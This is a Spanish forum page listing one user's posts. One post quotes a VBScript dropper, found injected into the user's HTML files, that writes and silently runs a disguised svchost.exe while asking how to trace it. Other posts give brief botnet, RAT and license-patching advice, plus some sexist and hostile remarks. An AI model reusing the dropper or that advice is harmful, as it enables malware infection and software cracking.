elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


  Mostrar Mensajes
Páginas: 1 2 3 4 [5] 6 7 8 9 10
41  Foros Generales / Foro Libre / Re: La prensa internacional destaca la huelga del 8-M en España como "histórica" en: 9 Marzo 2018, 03:46 am
Yo con estos temas soy muy "machista", simplemente buscan la supremacía femenina, españa es uno de los paises mas igualitarios del mundo y siguen, siguen, siguen...

Y los medios son patéticos en todos los paises, chupandole las medias a la izquierda :/
42  Foros Generales / Foro Libre / Busco gente para escribir un compilador en: 8 Marzo 2018, 03:49 am
Bueno, ya harto de escribir compiladores mediocres solo, me decidí hoy a escribir este post para buscar gente que me ayude a programar en el viejo vb6, ofrezco una maquina virtual W10 64 bits para el desarrollo de este proyecto (código cerrado/no github).

Código:
Solo personas con microfono y tiempo libre!

Esto solo se hace por hobbie/diversión/socialización/aprendizaje, sin embargo se buscaria el desarrollo de un lenguaje bien hecho y completo (POO, Recursivo, Sobrecarga de operadores - Procedimientos,1 sondeo, etc), por lo que se solicita gente con experiencia en programación y buena comprensión de la lógica de esta.

Código:
Lamentablemente solo se aceptan 3 programadores!

Pueden ofrecerse en comentarios (?)
43  Foros Generales / Dudas Generales / Escritorio dividido via AnyDesk en: 15 Enero 2018, 20:52 pm
Compré un CPU nuevo y lo comparto con mi hermanito, lo que necesito es crear 2 escritorios. Uno para mi hermanito y el otro para controlar de forma remota vía AnyDesk, necesitan trabajar en paralelo y totalmente independientes un escritorio del otro ¿como puedo hacer esto?
44  Foros Generales / Dudas Generales / Saber que programa edita un archivo en: 27 Diciembre 2017, 15:50 pm
En un ordenador que uso como servidor hay un programa que modifica los archivos HTML añadiendo el siguiente código:

Código
  1. <SCRIPT Language=VBScript><!--
  2. DropFileName = "svchost.exe"
  3. WriteData = "4D5A90..." ' Básicamente un archivo ejecutable.
  4. Set FSO = CreateObject("Scripting.FileSystemObject")
  5. DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
  6. If FSO.FileExists(DropPath)=False Then
  7. Set FileObj = FSO.CreateTextFile(DropPath, True)
  8. For i = 1 To Len(WriteData) Step 2
  9. FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
  10. Next
  11. FileObj.Close
  12. End If
  13. Set WSHshell = CreateObject("WScript.Shell")
  14. WSHshell.Run DropPath, 0
  15. //--></SCRIPT>

Este código crea un ejecutable y lo ejecuta. El problema es que no puedo "atrapar" al ejecutable que hace esto.

¿Alguna sugerencia para esta situación?
45  Programación / Programación Visual Basic / Re: pasar pseudo codigo a visual basic 6.0 en: 22 Diciembre 2017, 20:06 pm
Mostrarme por que parte vas y te te ayudo

Nah mentira, acá no se hacen tareas  :laugh:
46  Foros Generales / Foro Libre / Re: La lacra de internet en: 28 Noviembre 2017, 13:30 pm
A los malditos que usan el Typedef de C/C++ para renombrar los tipos de datos elementales ("typedef unsigned int SOYidiotaYesteESMIDWORD") merecen la muerte, la muerte y las ardientes llamas del infierno.
47  Seguridad Informática / Análisis y Diseño de Malware / Re: [DUDA] Creación de botnet en: 16 Septiembre 2017, 07:46 am
Y... para el servidor te recomendaría cualquiera lenguaje que genere un .exe, yo personalmente nunca usaría un lenguaje como java o .net para crear un servidor de botnet.

Según tengo entendido, una botnet es semejante a cualquier troyano normal solo que con la variante de que por lo general se utilizan para realizar ataques de denegación de servicio, por esta razón se esperan una gran cantidad de conexiones y esto obliga a los desarrolladores a escribir los clientes en lenguajes como PHP, lo que les permite subir el cliente a un hosting de terceros que aguante las conexiones.

Te dejo el siguiente post que habla un poco de Winsocks de Windows.

C++ Winsockets como reconectar un cliente al server

¡Saludos!
48  Programación / .NET (C#, VB.NET, ASP) / Re: Duda con getElementByiD en: 10 Septiembre 2017, 18:18 pm
Podrías subirnos a pastebin el código fuente de la pagina html? así podría intentar resolver tu situación.
49  Programación / Ingeniería Inversa / Re: Programa para parchear en: 10 Septiembre 2017, 09:11 am
Tendrías que buscar algún manual de ollydbg, un BreakPoint solo crasheará tu programa, es una instrucción que detiene la ejecución, se utiliza para depurar.

Lo más común es que un programa realice alguna comparación lógica (cmp,memcmp,strcmp, entre muchísimos otros) para verificar si tenes la versión comprada. Deberías intentar buscarlo y aplicar el correspondiente cambio que te permita hacer desaparecer esa molesta ventana.
50  Seguridad Informática / Análisis y Diseño de Malware / Re: RAT. Creación de troyano en: 29 Agosto 2017, 22:19 pm
Creo que le dan muchas vueltas, aprende a usar Sockets (es una tontería en realidad), haz que el servidor se conecte, cuando lo haga empieza a recibir datos y utilízalos para administrar las funciones de tu servidor.

El cliente también es muy simple, tan fácil como crear la interfaz, iniciar la escucha, enlistar los servidores y empezar a mandar y recibir mensajes, nada del otro mundo.
Páginas: 1 2 3 4 [5] 6 7 8 9 10
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines